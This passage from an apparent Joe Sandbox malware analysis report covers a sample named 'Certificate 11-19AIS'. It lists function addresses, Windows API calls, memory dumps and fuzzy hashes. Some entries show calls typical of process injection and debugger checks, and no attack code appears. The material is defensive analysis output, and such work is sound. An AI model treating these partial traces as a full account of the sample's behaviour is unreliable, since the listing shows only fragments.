                                                                                • Part of subcall function 007B3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007B3AF3
                                                                                • Part of subcall function 007B3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B3B08
                                                                                • Part of subcall function 007B3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,007B3AA3,?), ref: 007B3D45
                                                                                • Part of subcall function 007B3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,007B3AA3,?), ref: 007B3D57
                                                                                • Part of subcall function 007B3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00871148,00871130,?,?,?,?,007B3AA3,?), ref: 007B3DC8
                                                                                • Part of subcall function 007B3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,007B3AA3,?), ref: 007B3E48
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B3AB3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 924797094-0
                                                                              • Opcode ID: 4e5db21aff816a3647ff052f410e952febe840f8c6d4e1282cf4b71749b0ccef
                                                                              • Instruction ID: 0c741bd87931de029d83dba8d385f52e19c8015212b3355f189296e0d1c07743
                                                                              • Opcode Fuzzy Hash: 4e5db21aff816a3647ff052f410e952febe840f8c6d4e1282cf4b71749b0ccef
                                                                              • Instruction Fuzzy Hash: 8F118C71A04341DBC710EF69EC4DA4ABBE8FB94710F00891EF488872A2DB749585CFA2
                                                                              Function 007DE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___lock_fhandle.LIBCMT ref: 007DEA29
                                                                              • __close_nolock.LIBCMT ref: 007DEA42
                                                                                • Part of subcall function 007D7BDA: __getptd_noexit.LIBCMT ref: 007D7BDA
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                              • String ID:
                                                                              • API String ID: 1046115767-0
                                                                              • Opcode ID: fe9623f58a77f2d8535127b89cc5fd4216f922ef5855bc0d398d8dafb966a714
                                                                              • Instruction ID: ce0259324e18e1c827ab2f78c6264cb793ece5202264c48bd39a45d965e89114
                                                                              • Opcode Fuzzy Hash: fe9623f58a77f2d8535127b89cc5fd4216f922ef5855bc0d398d8dafb966a714
                                                                              • Instruction Fuzzy Hash: A9119E72815611DAD317BB6488493287A707F81331F2A8243E4685F3E2DBBC8C40CAA1
                                                                              Function 007CF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007D395C: __FF_MSGBANNER.LIBCMT ref: 007D3973
                                                                                • Part of subcall function 007D395C: __NMSG_WRITE.LIBCMT ref: 007D397A
                                                                                • Part of subcall function 007D395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,007CF507,?,0000000E), ref: 007D399F
                                                                              • std::exception::exception.LIBCMT ref: 007CF51E
                                                                              • __CxxThrowException@8.LIBCMT ref: 007CF533
                                                                                • Part of subcall function 007D6805: RaiseException.KERNEL32(?,?,0000000E,00866A30,?,?,?,007CF538,0000000E,00866A30,?,00000001), ref: 007D6856
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              • Opcode ID: 71465822a1805ca8034fcbc58768909d8b310c9960d660d10e769a79e27233dc
                                                                              • Instruction ID: fbcc8d893c1ab6861fc90b1d1393349b014d5e5ef0e1a10e4c25c848d522d62c
                                                                              • Opcode Fuzzy Hash: 71465822a1805ca8034fcbc58768909d8b310c9960d660d10e769a79e27233dc
                                                                              • Instruction Fuzzy Hash: F8F0AF3110422EA7DB04BF98E905EDE77A9AF00394F60402EFA08E2281DBB8D75496E5
                                                                              Function 007D35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • __lock_file.LIBCMT ref: 007D3629
                                                                                • Part of subcall function 007D4E1C: __lock.LIBCMT ref: 007D4E3F
                                                                              • __fclose_nolock.LIBCMT ref: 007D3634
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 06df9b5aa3da3f8566ceec120b9780717187d6907fb079ab05635562b93e8ded
                                                                              • Instruction ID: ce5779603d622c18a90458243a6c1a446108c43d756247a0421d324aa8fee658
                                                                              • Opcode Fuzzy Hash: 06df9b5aa3da3f8566ceec120b9780717187d6907fb079ab05635562b93e8ded
                                                                              • Instruction Fuzzy Hash: 70F0B471801204EAD7117B75880A76E7BB0AF41731F25815BE465EB3C1CB7CCB019FA6
                                                                              Function 00EF1975 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF2133
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF21C9
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF21EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                              • Instruction ID: 2b49212afaa88b808c8e186ca384697038f0b386a4d41f32850064314b402a4f
                                                                              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                              • Instruction Fuzzy Hash: CE12C024E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F81CF5A
                                                                              Function 007D2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 007D2A0B
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __flush__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 4101623367-0
                                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                              • Instruction ID: 77e0c1a457db851ce5a7f4724b4ae1926a1fbef03299b033e381e7bdf900ec0f
                                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                              • Instruction Fuzzy Hash: 9C41C8707007069FDB288E69C89056EB7B6EFA4360B24C52FE845D7342EB78ED438B50
                                                                              Function 007CED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: 2202d0bf537b36d0b85a16f35779677a5797f86a33618c78f54853acf402ceb1
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 7931B3B5B005059BD718DF58C480A69FBA6FF49340B6486ADE40ACB256DB39EDC1CBD0
                                                                              Function 0081040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: b5bcef8180ff92f96c138d35a56aaf959578717d3ea5e62681c305eb34bf6510
                                                                              • Instruction ID: 95660e1e777c10a76627823824de2004fbdb39cd954db39c485446f37429795d
                                                                              • Opcode Fuzzy Hash: b5bcef8180ff92f96c138d35a56aaf959578717d3ea5e62681c305eb34bf6510
                                                                              • Instruction Fuzzy Hash: E031C235204528DFCB11AF00D484BEE77B5FF48324F20844EEA95AB386DBB4A981CF91
                                                                              Function 00829A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 43e9f19bbf0f4e0f4f713d3845621ed2db024e5fca9b3cb4e3bc96a82ab894f6
                                                                              • Instruction ID: 7693d3d2f73d3851491a9f4cbf8cb8a1613bee38b0a301bc08dd5bfc35c8e86b
                                                                              • Opcode Fuzzy Hash: 43e9f19bbf0f4e0f4f713d3845621ed2db024e5fca9b3cb4e3bc96a82ab894f6
                                                                              • Instruction Fuzzy Hash: 87413C70604651CFDB24DF18D484F1ABBE1BF45314F1989ACE99A4B362C376E885CF92
                                                                              Function 007B41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B4214: FreeLibrary.KERNEL32(00000000,?), ref: 007B4247
                                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007B39FE,?,00000001), ref: 007B41DB
                                                                                • Part of subcall function 007B4291: FreeLibrary.KERNEL32(00000000), ref: 007B42C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Free$Load
                                                                              • String ID:
                                                                              • API String ID: 2391024519-0
                                                                              • Opcode ID: 91ffeea96a39850cece716f61f057040bf428e1bbf610b98bed5e5b6a3f04954
                                                                              • Instruction ID: 18cf4a56bfdda506b141e789ae88e44f8712564367fe06a2903ea85b9afe6632
                                                                              • Opcode Fuzzy Hash: 91ffeea96a39850cece716f61f057040bf428e1bbf610b98bed5e5b6a3f04954
                                                                              • Instruction Fuzzy Hash: 3E11A331600316FADB14AB74DD0AFEE77E9BF80700F108429F596E61C2DE78DA44AB61
                                                                              Function 00829B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 7703c2bca3e6e601299ffd6bc231f885d411e6912a50870ae6654bcd3c109db1
                                                                              • Instruction ID: 0bde969eacb6946daf17023a2ffab11ae772fa0cc7af09b8e0ea9f9c4a32ada0
                                                                              • Opcode Fuzzy Hash: 7703c2bca3e6e601299ffd6bc231f885d411e6912a50870ae6654bcd3c109db1
                                                                              • Instruction Fuzzy Hash: CF211370608601CFDB24DF68D448F6ABBE1BF84304F14496CFA9A4B222D739E855CF92
                                                                              Function 007DAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___lock_fhandle.LIBCMT ref: 007DAFC0
                                                                                • Part of subcall function 007D7BDA: __getptd_noexit.LIBCMT ref: 007D7BDA
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                                              • String ID:
                                                                              • API String ID: 1144279405-0
                                                                              • Opcode ID: 69067e5cfc3488c5833bdaf65f90536a47a55d4d3bfbd6261ddb761ebb3922c9
                                                                              • Instruction ID: 44d5191a03d2bd5c9a23f0a3127ebaed4ff59e5037b95b8ab9bbbb62a5afcf6a
                                                                              • Opcode Fuzzy Hash: 69067e5cfc3488c5833bdaf65f90536a47a55d4d3bfbd6261ddb761ebb3922c9
                                                                              • Instruction Fuzzy Hash: 5F11B2B2814600DFD7167FA488497593A70AF41332F2A4243E4345F3E2E7BD8D40DBA1
                                                                              Function 007B39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                              • Instruction ID: 69323c21fa2d568ed5bdeb2366140e792cc5d9efba7a8bceb6f95f34f2ee739a
                                                                              • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                              • Instruction Fuzzy Hash: A001313150010DFECF05EFA4C9969FEBB74EF20344F10806AB566971A6EA349A89DB61
                                                                              Function 007D2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 007D2AED
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2597487223-0
                                                                              • Opcode ID: 922eab3eea06c829b94da4be18bd27774adefac99dfced5fe9c16a371b5e10ca
                                                                              • Instruction ID: 29cc6d227d8e77cb9a8dbbc78b06f3450e62dc4820592faffe986d1d2906b9d2
                                                                              • Opcode Fuzzy Hash: 922eab3eea06c829b94da4be18bd27774adefac99dfced5fe9c16a371b5e10ca
                                                                              • Instruction Fuzzy Hash: F3F06231600205FBDF21AF648C0A79F36B5BF50320F158457F814AA392D77C8A53DB51
                                                                              Function 007B4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,007B39FE,?,00000001), ref: 007B4286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 6066e3f9cad01809f29f7b58257e70e73d747287529f8f63e75a97635ac6950d
                                                                              • Instruction ID: e3398e529660534369c17c1a942e03bc556849aeebad35bcd210447285a74044
                                                                              • Opcode Fuzzy Hash: 6066e3f9cad01809f29f7b58257e70e73d747287529f8f63e75a97635ac6950d
                                                                              • Instruction Fuzzy Hash: 7BF03971505702DFCB349F64E894996BBF4BF043253248A3EF1D682612C77A9840EF50
                                                                              Function 007B40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007B40C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath
                                                                              • String ID:
                                                                              • API String ID: 82841172-0
                                                                              • Opcode ID: b8d010f60d540e0c66091f6f5d3fa2ec49d17ab440838d601d11195c0918941c
                                                                              • Instruction ID: 374f1127884611ea9cb1db00219a5075a28fe3ebfc51dd42833b221a85267b35
                                                                              • Opcode Fuzzy Hash: b8d010f60d540e0c66091f6f5d3fa2ec49d17ab440838d601d11195c0918941c
                                                                              • Instruction Fuzzy Hash: 7FE0CD365002245BC711A654DC46FEE77ADDFC8690F094175F905D7244D96899819690
                                                                              Function 00EF2978 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 00EF2989
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: c6009c7d80cfad0ae66c7a23cf31bcdc47a3e1a28b144951d49b5f37c92d4757
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: 13E0E67494020DDFDB00DFB4D5496AD7BB4EF04301F100165FD01E2280D7709D508A62

                                                                              Non-executed Functions

                                                                              Function 0081F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
